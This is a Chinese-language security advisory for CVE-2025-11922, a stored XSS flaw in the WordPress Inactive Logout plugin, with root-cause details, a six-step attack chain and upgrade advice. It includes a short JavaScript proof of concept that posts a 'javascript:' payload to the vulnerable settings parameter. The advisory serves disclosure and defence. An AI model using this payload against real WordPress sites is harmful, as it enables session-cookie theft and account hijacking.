CVE-2025-11922 WordPress Inactive Logout插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11922

漏洞类型

存储型XSS (Stored Cross-Site Scripting)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Inactive Logout WordPress插件

漏洞概述

CVE-2025-11922是WordPress Inactive Logout插件中的一个存储型跨站脚本(XSS)漏洞。该插件用于管理WordPress网站的闲置用户自动登出功能。漏洞存在于3.5.5及以下所有版本中，由于插件对'ina_redirect_page_individual_user'参数缺乏充分的输入清理和输出转义，导致攻击者可以在页面中注入任意Web脚本。由于是存储型XSS，恶意脚本会被永久存储在数据库中，任何访问相关页面的用户都会触发该脚本执行。攻击者利用此漏洞可窃取会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。攻击者只需拥有订阅者级别(subscriber)的低权限账户即可发起攻击，无需管理员权限。

技术细节

该漏洞的根本原因在于Admin/StoreController.php中第84行对用户输入的'ina_redirect_page_individual_user'参数处理不当。插件在接收用户提交的重定向页面URL参数时，仅进行了基本验证但未进行充分的输入清理和输出转义。当该参数值被存储到数据库后，在AdminController.php第32行以及视图文件tpl-inactive-logout-advanced.php第99行输出时，未正确使用htmlspecialchars()或类似函数进行转义处理。攻击者可通过构造包含JavaScript代码的Payload（如：javascript:alert(document.cookie)）作为重定向URL，当管理员或其他用户访问相关管理页面或触发登出重定向功能时，恶意脚本将在受害者浏览器上下文中执行。由于该参数直接存储在数据库中，攻击具有持久性。攻击者可结合社会工程学诱导管理员访问特定页面以获取更高权限。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本及Inactive Logout插件版本，确认版本≤3.5.5

STEP 2

Authentication

攻击者获取WordPress订阅者级别或更高权限账户（可通过注册功能获取）

STEP 3

Payload Preparation

攻击者构造包含恶意JavaScript代码的XSS Payload，如javascript:alert(document.cookie)

STEP 4

Injection

通过插件设置页面或AJAX接口提交Payload到'ina_redirect_page_individual_user'参数，Payload被存储到数据库

STEP 5

Trigger

当管理员访问插件设置页面或用户触发登出重定向时，恶意脚本在受害者浏览器中执行

STEP 6

Impact

攻击者窃取用户会话Cookie、劫持账户、执行任意操作或进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-11922 PoC - Stored XSS in Inactive Logout Plugin
// Requires: Subscriber-level access or higher

// Step 1: Identify the vulnerable parameter
const vulnerableParam = 'ina_redirect_page_individual_user';

// Step 2: Prepare XSS payload
const xssPayload = 'javascript:alert(document.domain)';

// Step 3: Submit the payload via AJAX or form submission
// This typically goes to wp-admin/admin-ajax.php or settings page
const exploit = {
    action: 'ina_save_advanced_settings',
    [vulnerableParam]: xssPayload,
    nonce: '[VALID_NONCE]' // WordPress security nonce
};

// Step 4: Example fetch request (requires valid authentication)
fetch(ajaxUrl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams(exploit)
});

// Alternative: Direct plugin settings update via REST API or admin page
// The XSS will execute when:
// 1. Admin views the Advanced settings tab
// 2. User with individual settings triggers logout redirect

影响范围

Inactive Logout WordPress插件 <= 3.5.5

防御指南

临时缓解措施

立即将Inactive Logout插件升级到3.5.6或最新版本。在等待更新期间，可临时禁用该插件或使用WAF（如Wordfence）添加XSS过滤规则，同时限制低权限用户的插件设置访问权限。建议审查所有用户输入字段，实施严格的输入验证和输出编码。